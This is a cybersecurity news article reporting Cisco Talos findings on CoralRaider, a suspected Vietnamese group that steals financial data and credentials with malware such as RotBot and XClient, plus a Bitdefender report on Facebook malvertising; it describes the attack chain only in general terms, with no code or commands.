CoralRaider Group Targets Financial Data in Multi-National Cyber Attack”
A suspected Vietnamese-origin cyber espionage group known as CoralRaider has been identified by cybersecurity experts for orchestrating a complex malware campaign across multiple Asian and Southeast Asian nations since May 2023. The group’s primary objective appears to be the theft of financial data and credentials from a range of targets, including businesses and individuals, in countries such as India, China, South Korea, Bangladesh, Pakistan, Indonesia, and its home base, Vietnam.
Cisco Talos, a leading cybersecurity research team, has been actively monitoring the CoralRaider cluster, categorizing it as financially motivated. According to Chetan Raghuprasad and Joey Chen, security researchers involved in the investigation, CoralRaider employs a variety of malware tools, including RotBot, a customized version of Quasar RAT, and XClient stealer, to carry out its operations. Additionally, the group utilizes other common malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys to further its goals.
Of particular concern is the group’s focus on hijacking business and advertisement accounts, utilizing malware families like Ducktail, NodeStealer, and VietCredCare to exploit these accounts for monetary gain. The stolen information is then traded on underground markets to generate illicit profits.
CoralRaider’s operations are predominantly based in Vietnam, evident from the language used in their communication channels and the coding of their malware payloads. The group’s attack chain typically begins with the distribution of Windows shortcut files (LNK) to potential victims, although the exact method of distribution remains unclear.
Once initiated, the attack progresses with the execution of PowerShell scripts designed to evade detection and download and execute RotBot and XClient malware. These malicious programs are adept at stealing various forms of sensitive information, including financial data, social media credentials, and browser cookies, from a wide array of platforms such as Facebook, Instagram, TikTok, YouTube, Discord, and Telegram.
In a separate development, cybersecurity firm Bitdefender has uncovered a malvertising campaign on Facebook exploiting the popularity of generative AI tools to distribute information stealers like Rilide, Vidar, IceRAT, and Nova Stealer. These campaigns have been observed targeting European users through sponsored ads on the platform.
As cyber threats continue to evolve and grow in sophistication, organizations and individuals alike must remain vigilant and employ robust cybersecurity measures to protect their sensitive data from falling into the hands of malicious actors.
